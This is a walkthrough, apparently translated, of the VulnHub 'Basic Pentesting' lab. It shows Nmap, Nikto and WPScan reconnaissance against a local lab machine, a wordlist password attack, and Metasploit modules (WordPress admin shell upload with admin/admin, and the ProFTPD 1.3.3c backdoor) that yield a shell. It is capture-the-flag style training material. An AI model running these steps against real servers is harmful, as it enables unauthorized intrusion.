VulnHub Basic Pentesting

Published on April 02, 2018

VulnHub Basic Pentesting


Good day to all.


Many of you know about Pentest, someone even dealt with him, and someone just heard and would like to feel like a mini specialist in this field. A long time ago, or maybe not long ago, a laboratory dedicated to just that appeared on VulnHub .


ACT I - Setup


For work, I used Kali Linux and VirtualBox, and of the laboratory itself, of course.
Now we need to connect 2 cars. To make it simple: open cmd and go to the directory where VirtualBox is installed and prescribe the settings for VboxManage


Commands to configure VBoxManage
cd C:\Program Files\Oracle\VirtualBox

C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable> 


Now in the Kali and Pentest settings we put the name of the network that we wrote in cmd



ACT II - In the beginning


Check if Kali Linux sees our lab.



We see the connection to eth0 . Now we need to find out the specific IP of our machine. For this, we will use the notorious Nmap program



IP of our laboratory 10.0.1.2


ACT III - Basic Pentesting


After Nmap scanned our virtual network, we saw that 3 ports were open in the laboratory:


  • 21 - ftp
  • 22 - ssh
  • 80 - http

We are trying to connect to port 80. To do this, open the browser (in my case, it's FireFox)



Fine! The site is working. Let's check which directories it hides from us. To do this, we will use the wonderful nikto program and look at the result.



OSVDB-3092: /secret/: This might be interesting

The secret directory should be interesting. Let's find out what she is hiding



It looks, of course, at 3 out of 10, but it can all be fixed, in the name of beauty and convenience, of course.


The most attentive, probably already guessed, and nikto with Nmap hinted us more than once.


 -  Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>
 -  Nmap scan report for vtcsec (10.0.1.2)

Let's add a name in hosts, through terminal:


# echo "10.0.1.2 vtcsec" >> /etc/hosts

Now we are ready to see all the beauty of the site



Now, like a bloodhound, we look at all the directories of the site, poke at everything that is poked and in the end we find out that the site is written in WordPress. Yes - yes nikto told us before that, but we are not looking for easy ways.


Let's Use WordPress Vulnerability Scanner - WPScan


# wpscan --url http://10.0.1.2/secret/

WPScan output

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@ WPScan , @ ethicalhack3r, @erwan_lr, pvdl, @ FireFart




[+] URL: http://10.0.1.2/secret/
[+] Started: Thu Mar 8 17:47:02 2018
[!] The WordPress 'http://10.0.1.2/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: http://vtcsec/secret/index.php/wp-json/; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.0.1.2/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.0.1.2/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.1.2/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 — Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 — RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 — HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 — 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 — MediaElement Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9006
Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/ticket/42720
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 — Application Denial of Service (DoS) (unpatched)
Reference: https://wpvulndb.com/vulnerabilities/9021
Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
Reference: https://github.com/quitten/doser.py
Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
[+] WordPress theme in use: twentyseventeen — v1.4
[+] Name: twentyseventeen — v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/
| Readme: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/style.css
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a…
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection…
[+] No plugins found
[+] Finished: Thu Mar 8 17:47:06 2018
[+] Requests Done: 89
[+] Memory used: 37.828 MB
[+] Elapsed time: 00:00:03


Hmmm, let's try to list all the usernames with the --enumerate u flag .


# wpscan --url http://10.0.1.2/secret/ --enumerate u


There is only one user. So, you can try to tweak the password.


# wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2


Unfortunately, our brutus was not successful, but we saw something interesting - an error in the login admin and password admin.


I'll have to try exploit through Metasploit


ACT IV - Admin is coming


First you need to configure Metasploit .


#/etc/init.d/postgresql start
# msfdb init

Let's get started!


# msfconsole

Need to find our exploit. We use the search command


# search admin

From the list, wp_admin_shell_upload suits us


We launch it and we carry out setup


# msf>use exploit/unix/webapp/wp_admin_shell_upload
# msf>set username admin
# msf>set password admin
# msf>set rhost 10.0.1.2
# msf>set targeturi /secret

It should be like this:



Launch!



Go to the browser and go under admin / admin



ACT V - I see backdoor


Now try to access the terminal. To do this, again we need Metasploit.


# msf>use exploit/unix/ftp/proftpd_133c_backdoor

We carry out setup


# msf>set rhost 10.0.1.2


Launch! ( you can use exploit instead of run )



Tadaaam, we got access to the console.